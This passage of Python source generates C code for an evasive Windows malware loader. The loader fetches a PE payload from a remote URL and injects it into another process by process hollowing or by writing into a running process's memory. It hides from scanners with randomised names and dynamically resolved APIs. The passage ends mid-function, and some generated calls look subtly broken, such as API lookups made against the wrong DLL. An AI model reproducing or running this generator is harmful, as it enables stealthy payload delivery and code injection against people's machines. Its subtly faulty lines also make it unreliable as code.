    IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include <wininet.h>\n"

    #if ModOpt["ExecMethod"] in ["Chimera","C"]:

    #Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "STARTUPINFOA " + Randsi + ";\n"
    Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
    Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(" + Randsi + "));\n"
    Ret_code += Randsi + ".cb = sizeof(" + Randsi + ");\n"
    Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(" + Randpi + "));\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"

    if ModOpt["ExecMethod"] in ["Chimera","C"]:

        RandhProcess = varname_creator()
        Randentry = varname_creator()
        RandProcsnapshot = varname_creator()
        Randlpv2 = varname_creator()

        Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
        Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"

        if ModOpt["DynImport"] == True:

            NdcTl32Snapshot = varname_creator()
            NdcProcess32First = varname_creator()
            NdcProcess32Next = varname_creator()
            NdcOpenProcess = varname_creator()

            Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
            Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
            Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
            Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
            Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
            Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
            Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
        else:
            Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
            Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
            Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"

    elif ModOpt["ExecMethod"] == "ProcessHollowing" or ModOpt["ExecMethod"] == "PH":

        if ModOpt["DynImport"] == True:
            NdcCreateProcessA = varname_creator()
            Ret_code += "FARPROC " + NdcCreateProcessA + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateProcessA\");\n"
            Ret_code += NdcCreateProcessA + "(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
        else:
            Ret_code += "CreateProcessA(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"

        Ret_code += "CONTEXT " + RandTcontext + ";\n"
        Ret_code += RandTcontext + ".ContextFlags = CONTEXT_FULL;\n"

        if ModOpt["DynImport"] == True:

            NdcGetThreadContext = varname_creator()
            Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"GetThreadContext\");\n"
            Ret_code += "if (" + NdcGetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"
        else:
            Ret_code += "if (GetThreadContext(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"

    Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
    Ret_code += "DWORD " + RandvarBWritten + " = 0;\n"

    if ModOpt["DynImport"] == True:
        NdcInternetOpenA = varname_creator()
        NdcInternetOpenUrl = varname_creator()
        NdcVirtualAlloc = varname_creator()
        NdcInternetReadFile = varname_creator()
 
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
        Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
        Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
        Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
    else:
        Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
        Ret_code += "unsigned char * " + Randlpv + " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"

    Ret_code += Randpointer + " += " + RandvarBRead + ";\n"
    Ret_code += "}while(" + RandvarBRead + " > 0);\n"

    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    Ret_code += "typedef struct BASE_RELOCATION_BLOCK {"
    Ret_code += "DWORD PageAddress;"
    Ret_code += "DWORD BlockSize;"
    Ret_code += "} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;\n"

    Ret_code += "typedef struct BASE_RELOCATION_ENTRY {"
    Ret_code += "USHORT Offset : 12;"
    Ret_code += "USHORT Type : 4;"
    Ret_code += "} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;\n"

    Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
    Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
    Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
    Ret_code += RandImgDosHeader + " = (PIMAGE_DOS_HEADER)" + Randlpv + ";\n"


    if ModOpt["DynImport"] == True:

        NdcReadProcessMemory = varname_creator()
        NdcWriteProcessMemory = varname_creator()
        NdcVirtualAllocEx = varname_creator()
        NdcVirtualProtectEx = varname_creator()

        Ret_code += "FARPROC " + NdcReadProcessMemory + " = GetProcAddress(" + Wininet + ", \"ReadProcessMemory\");\n"
        Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + Wininet + ", \"WriteProcessMemory\");\n"
        Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"            
        Ret_code += "FARPROC " + NdcVirtualProtectEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualProtectEx\");\n"   


    if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:

        Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
        Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n" 
        Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"

        if ModOpt["Arch"] == "x86":

            if ModOpt["DynImport"] == True:

                Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

            else:

                Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

        else:

            if ModOpt["DynImport"] == True:

                Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n"  #if x64 proc

            else:
                Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

        Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
        Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
        Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
        Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"

        if ModOpt["DynImport"] == True:

            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
            Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
        else:
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
            Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"


    elif ModOpt["ExecMethod"] in ["Chimera","C"]:
        #Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
        Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n" 
        #Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"
        Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
        Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
        Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
        #Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"

        if ModOpt["DynImport"] == True:

            #Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            #Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
            #Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            #Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"

        else:
            #Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            #Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
            #Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            #Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"


    Ret_code += "SIZE_T " + RandDelta + " = (SIZE_T)" + RandlpNewImgBAddr + "-" + RandImgNTHeader + "->OptionalHeader.ImageBase;\n"
    Ret_code += RandImgNTHeader + "->OptionalHeader.ImageBase = (SIZE_T)" + RandlpNewImgBAddr + ";\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
        Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
        Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"

    else:
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
        Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
        Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress),(PVOID)((LPBYTE)" + Randlpv + "+" + RandImgSectHeader + "->PointerToRawData)," + RandImgSectHeader + "->SizeOfRawData, NULL);}\n"

    Ret_code += "if(" + RandDelta + " != 0){\n"
    Ret_code += "for (int " + Randflag2 + " = 0;" + Randflag2 + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag2 + "++){\n"
        #.reloc section
    Ret_code += "char* " + RandSectName + " = \".reloc\";\n"
    Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag2 + "*sizeof(IMAGE_SECTION_HEADER)));\n"
    Ret_code += "if(memcmp(" + RandImgSectHeader + "->Name, " + RandSectName + ",strlen(" + RandSectName + ")))continue;\n"
    Ret_code += "DWORD " + RandRelocSectRawData + " = " + RandImgSectHeader + "->PointerToRawData;\n"
    Ret_code += "DWORD " + RandOffsetInRelocSect + " = 0;\n"
    Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
    #relocation data
    Ret_code += "while(" + RandOffsetInRelocSect + "<" + RandrelocData + ".Size){\n"
    Ret_code += "PBASE_RELOCATION_BLOCK pBlockheader = (PBASE_RELOCATION_BLOCK)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
    Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_BLOCK);\n"
    Ret_code += "DWORD " + RandEntryCount + " = pBlockheader->BlockSize - (sizeof(BASE_RELOCATION_BLOCK)) / (sizeof(BASE_RELOCATION_ENTRY));\n"
    Ret_code += "PBASE_RELOCATION_ENTRY " + RandPBlocks + " = (PBASE_RELOCATION_ENTRY)((SIZE_T)" + Randlpv + "+" + RandRelocSectRawData + "+" + RandOffsetInRelocSect + ");\n"
    Ret_code += "for(DWORD " + Randflag3 + " =0;" + Randflag3 + "<" + RandEntryCount + ";" + Randflag3 + "++){\n"
    Ret_code += RandOffsetInRelocSect + "+=sizeof(BASE_RELOCATION_ENTRY);\n"
    Ret_code += "if(" + RandPBlocks + "[" + Randflag3 + "].Type==0)continue;\n"
    Ret_code += "SIZE_T " + RandFieldAddr + " = pBlockheader->PageAddress + " + RandPBlocks + "[" + Randflag3 + "].Offset;\n"
    Ret_code += "SIZE_T " + RandDwBuff + " = 0;\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
        Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"

        Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
        Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"

    else:

        Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),0);\n"
        Ret_code += RandDwBuff + "+=" + RandDelta + ";\n"
        Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)((SIZE_T)" + RandlpNewImgBAddr + "+" + RandFieldAddr + "),&" + RandDwBuff + ",sizeof(SIZE_T),NULL);}}}}\n"
        Ret_code += "DWORD " + RandlOldProtect + " = 0;\n"
        Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,PAGE_READONLY, &" + RandlOldProtect + ");\n"

    Ret_code += "for(int " + Randflag + " = 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
    Ret_code += RandImgSectHeader + " = (PIMAGE_SECTION_HEADER)((LPBYTE)" + Randlpv + "+" + RandImgDosHeader + "->e_lfanew+sizeof(IMAGE_NT_HEADERS)+(" + Randflag + "*sizeof(IMAGE_SECTION_HEADER)));\n"
    Ret_code += "DWORD " + RandlNewProtect + " = 0;\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_EXECUTE){\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
    Ret_code += "if ((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READWRITE;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_READ;}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE_WRITECOPY;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_EXECUTE;}}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_READ){\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_READWRITE;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_READONLY;}\n"
    Ret_code += "}else{\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_WRITE){\n"
    Ret_code += RandlNewProtect + " = PAGE_WRITECOPY;\n"
    Ret_code += "}else{\n"
    Ret_code += RandlNewProtect + " = PAGE_NOACCESS;}}}\n"
    Ret_code += "if((" + RandImgSectHeader + "->Characteristics) & IMAGE_SCN_MEM_NOT_CACHED){\n"
    Ret_code += RandlNewProtect + " |= PAGE_NOCACHE;}\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcVirtualProtectEx + "(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"
    else:
        Ret_code += "VirtualProtectEx(" + Randpi + ".hProcess,(PVOID)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgSectHeader + "->VirtualAddress)," + RandImgSectHeader + "->SizeOfRawData," + RandlNewProtect + ",&" + RandlOldProtect + ");}\n"

    if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:

        if ModOpt["DynImport"] == True:

            NdcSetThreadContext = varname_creator()
            NdcResumeThread = varname_creator()

            if ModOpt["Arch"] == "x86":

                Ret_code += RandTcontext + ".Eax = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            else:

                Ret_code += RandTcontext + ".Rcx = (SIZE_T)((LPBYTE)" + RandlpNewImgBAddr + "+" + RandImgNTHeader + "->OptionalHeader.AddressOfEntryPoint);\n"
                Ret_code += "WriteProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext + ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpNewImgBAddr + ",sizeof(" + RandlpNewImgBAddr + "), NULL);\n"

            Ret_code += "FARPROC " + NdcSetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"SetThreadContext\");\n"
            Ret_code += "FARPROC " + NdcResumeThread + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"ResumeThread\");\n"
            Ret_code += NdcSetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext+ ");\n"
            Ret_code += NdcResumeThread + "(" + Randpi + ".hThread);\n"

        else:

            if ModOpt["Arch"] == "x86":
